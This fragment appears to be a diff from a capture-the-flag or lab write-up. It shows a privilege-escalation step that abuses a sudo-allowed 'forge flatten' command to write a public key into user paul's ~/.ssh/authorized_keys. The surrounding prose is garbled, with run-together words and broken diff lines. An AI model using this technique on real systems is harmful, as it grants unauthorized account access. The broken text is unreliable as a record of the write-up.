Reconnaissance#

 - Exploit it using the

-option to write the public key to the userpaul
+flattenoption to write the public key to the userpaul’s home directory in this.ssh/authorized_keysfile

 sudo -u paul /home/paul/.foundry/bin/forge flatten /tmp/pub -o /home/paul/.ssh/authorized_keys